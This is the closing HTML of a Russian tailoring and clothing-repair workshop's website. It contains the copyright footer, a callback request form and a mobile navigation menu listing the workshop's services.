    <p style="text-align: center;"><img alt="" class="dd-lightbox" src="insert-3-with-gold.png" width="900" height="87"><span style="font-size: 12px;"><br></span></p><p style="text-align: center;"><span style="color: rgb(150, 105, 54); text-shadow: 0px 1px 0px rgba(255, 255, 255, 0.808); font-size: 14px;">Copyright © 2020 Мастерская-ателье "Armsa"<br> ИП Мальгина Н.А. ОГРНИП 316565800115251 Указанная на сайте информация, является ознакомительной и не является публичной офертой, согласно положению ч.1 и ч.2 ст. 437 ГK РФ.</span></p>
    <p class="dd-page-footer"></p>
</div><div id="contactus-lightbox91" class="contactus-lightbox contactus-lightbox91">
	<div class="contactus-lightbox-caption" style="background-color: rgb(138, 97, 21);">
		<div class="contactus-lightbox-cap"><h4 class="text-center">Оставьте номер телефона и мастер перезвонит вам в ближайшее время</h4></div><div class="contactus-lightbox-closer"><i id="contactus-lightbox-close91" class="fa fa-close fa-1x"></i></div>		
	</div>
	<div class="contactus-lightbox-body">
		<form action="" method="post" class="reg_form" enctype="multipart/form-data">
		<div>
							<div class="joomly-contactus-div">
					<input placeholder="Имя*" class="contactus-fields" name="name" required="" value="" type="text">
				</div>
					
										<div class="joomly-contactus-div">
					<input pattern="(\+?\d[- .\(\)]*){5,15}" placeholder="Телефон*" class="contactus-fields" name="phone" required="" value="" type="tel">
				</div>
					
				
							<div class="joomly-contactus-div">
				<textarea placeholder="Сообщение*" class="contactus-textarea contactus-fields" name="message" cols="120" rows="6" required=""></textarea>
			</div>
				
						<div>
				<input name="phones" class="contactus-fields-const" style="display: none;" type="text">
			</div>	
							<div class="joomly-contactus-div">
					<label class="contactus-label-center"><a href="" target="_blank" class="modal_link rl_modals_element" aria-label="Politika" data-modal-iframe="true" data-modal-inner-width="95%" data-modal-inner-height="95%" data-modal-image="true" data-modal-title="Politika" data-modal-class-name="is_image" data-modal-done="1">Согласие на обработку персональных данных</a><input class="joomly-contactus-checkbox" checked="" required="" type="checkbox"></label>
				</div>	
					
				
		</div>
		<div>
			<button type="submit" value="save" class="contactus-button contactus-submit" style="background-color: rgb(138, 97, 21);" id="button-contactus-lightbox91">Получить консультацию</button>
		</div>
		<div>
			<input name="option" value="com_contactus" type="hidden">
			<input name="layout" value="lightbox" type="hidden">
			<input name="module_token" data-sitekey="" value="" type="hidden">	
			<input name="module_id" value="91" type="hidden">	
			<input name="module_title" value="Обратный звонок главная" type="hidden">	
			<input name="module_hash" value="d3a1d3bc7d27d909f95d7769c24372b2" type="hidden">
			<input name="page" value="" type="hidden">
			<input name="ip" value="185.190.104.77" type="hidden">
			<input name="task" value="add.save" type="hidden">
			<input name="56f0bcc1c54f20dd6762074f24e9221f" value="1" type="hidden">		</div>	
		</form>
	</div>
</div>

<div id="rl_modals_overlay" style="display: none;"></div><div id="rl_modals" role="dialog" aria-hidden="true" aria-labelledby="rl_modals_title" aria-describedby="rl_modals_current" style="display: none;"><div id="rl_modals_wrapper"><div><div id="rl_modals_top_left" style="float: left;"></div><div id="rl_modals_top_center" style="float: left;"></div><div id="rl_modals_top_right" style="float: left;"></div></div><div style="clear: left;"><div id="rl_modals_middle_left" style="float: left;"></div><div id="rl_modals_content" style="float: left;"><div id="rl_modals_title" aria-live="polite" style="float: left;"></div><div id="rl_modals_current" style="float: left;"></div><button type="button" id="rl_modals_previous" aria-hidden="true">previous</button><button type="button" id="rl_modals_next" aria-hidden="true">next</button><button type="button" id="rl_modals_slideshow" aria-hidden="true">start slideshow</button><div id="rl_modals_loading_overlay" style="float: left;"></div><div id="rl_modals_loading_graphic" style="float: left;"></div></div><div id="rl_modals_middle_right" style="float: left;"></div></div><div style="clear: left;"><div id="rl_modals_bottom_left" style="float: left;"></div><div id="rl_modals_bottom_center" style="float: left;"></div><div id="rl_modals_bottom_right" style="float: left;"></div></div></div><div style="position: absolute; width: 9999px; visibility: hidden; display: none; max-width: none;"></div></div><div id="maximenuck94-mobile" class="mobilemenuck ltr" data-id="maximenuck94" style="position: absolute; z-index: 100000; top: 0px; left: 0px; display: none;"><div class="mobilemenuck-topbar"><div class="mobilemenuck-title">&nbsp;</div><div class="mobilemenuck-button">×</div></div><div class="mobilemenuck-item"><div class="menuck maximenuck item101 current active first parent level1 "><a href="#" class="maximenuck "><span class="mobilemenuck-item-text"><span class="titreck" data-hover="Главная">Главная</span></span></a></div><div class="mobilemenuck-submenu"><div class="mobilemenuck-item"><div class="menuck maximenuck item169 first level2 "><a href="" class="maximenuck "><span class="mobilemenuck-item-text"><span class="titreck" data-hover="О нас">О нас</span></span></a></div></div><div class="mobilemenuck-item"><div class="menuck maximenuck item122 level2 "><a href="" class="maximenuck "><span class="mobilemenuck-item-text"><span class="titreck" data-hover="Отзывы">Отзывы</span></span></a></div></div><div class="mobilemenuck-item"><div class="menuck maximenuck item170 level2 "><a href="" class="maximenuck "><span class="mobilemenuck-item-text"><span class="titreck" data-hover="Гарантии и возврат">Гарантии и возврат</span></span></a></div></div><div class="mobilemenuck-item"><div class="menuck maximenuck item171 last level2 "><a href="" class="maximenuck "><span class="mobilemenuck-item-text"><span class="titreck" data-hover="Вакансии">Вакансии</span></span></a></div></div></div></div><div class="mobilemenuck-item"><div class="menuck maximenuck item103 parent level1 "><a href="" class="maximenuck "><span class="mobilemenuck-item-text"><span class="titreck" data-hover="Пошив одежды">Пошив одежды</span></span></a></div><div class="mobilemenuck-submenu"><div class="mobilemenuck-item"><div class="menuck maximenuck item168 first level2 "><a href="" class="maximenuck "><span class="mobilemenuck-item-text"><span class="titreck" data-hover="Пошив женской одежды">Пошив женской одежды</span></span></a></div></div><div class="mobilemenuck-item"><div class="menuck maximenuck item105 last level2 "><a href="" class="maximenuck "><span class="mobilemenuck-item-text"><span class="titreck" data-hover="Пошив мужской одежды">Пошив мужской одежды</span></span></a></div></div></div></div><div class="mobilemenuck-item"><div class="menuck maximenuck item156 level1 "><a href="" class="maximenuck "><span class="mobilemenuck-item-text"><span class="titreck" data-hover="Ремонт одежды">Ремонт одежды</span></span></a></div></div><div class="mobilemenuck-item"><div class="menuck maximenuck item157 level1 "><a href="" class="maximenuck "><span class="mobilemenuck-item-text"><span class="titreck" data-hover="Корпоративным клиентам">Корпоративным клиентам</span></span></a></div></div><div class="mobilemenuck-item"><div class="menuck maximenuck item164 level1 "><a href="" class="maximenuck "><span class="mobilemenuck-item-text"><span class="titreck" data-hover="Кожа и меха">Кожа и меха</span></span></a></div></div><div class="mobilemenuck-item"><div class="menuck maximenuck item158 level1 "><a href="" class="maximenuck "><span class="mobilemenuck-item-text"><span class="titreck" data-hover="Домашний текстиль">Домашний текстиль</span></span></a></div></div><div class="mobilemenuck-item"><div class="menuck maximenuck item159 level1 "><a href="" class="maximenuck "><span class="mobilemenuck-item-text"><span class="titreck" data-hover="Вышивка">Вышивка</span></span></a></div></div><div class="mobilemenuck-item"><div class="menuck maximenuck item113 level1 "><a href="" class="maximenuck "><span class="mobilemenuck-item-text"><span class="titreck" data-hover="Памятка">Памятка</span></span></a></div></div><div class="mobilemenuck-item"><div class="menuck maximenuck item138 level1 "><a href="" class="maximenuck "><span class="mobilemenuck-item-text"><span class="titreck" data-hover="Галерея">Галерея</span></span></a></div></div><div class="mobilemenuck-item"><div class="menuck maximenuck item163 level1 "><a href="" class="maximenuck "><span class="mobilemenuck-item-text"><span class="titreck" data-hover="Скидки и акции">Скидки и акции</span></span></a></div></div><div class="mobilemenuck-item"><div class="menuck maximenuck item102 last level1 "><a href="" class="maximenuck "><span class="mobilemenuck-item-text"><span class="titreck" data-hover="Контакты">Контакты</span></span></a></div></div></div><div id="maximenuck94-mobile-bar" class="mobilemenuck-bar ltr" style="position: absolute;" data-id="maximenuck94"><div class="mobilemenuck-bar-title">&nbsp;</div><div class="mobilemenuck-bar-button">≡</div></div><div id="dd-resp"><div id="dd-resp-m"></div><div id="dd-resp-t"></div></div><div id="dd-resp-tablet-landscape"></div><div id="dd-resp-tablet-portrait"></div><div id="dd-resp-phone-landscape"></div><div id="dd-resp-phone-portrait"></div></body>
</html>
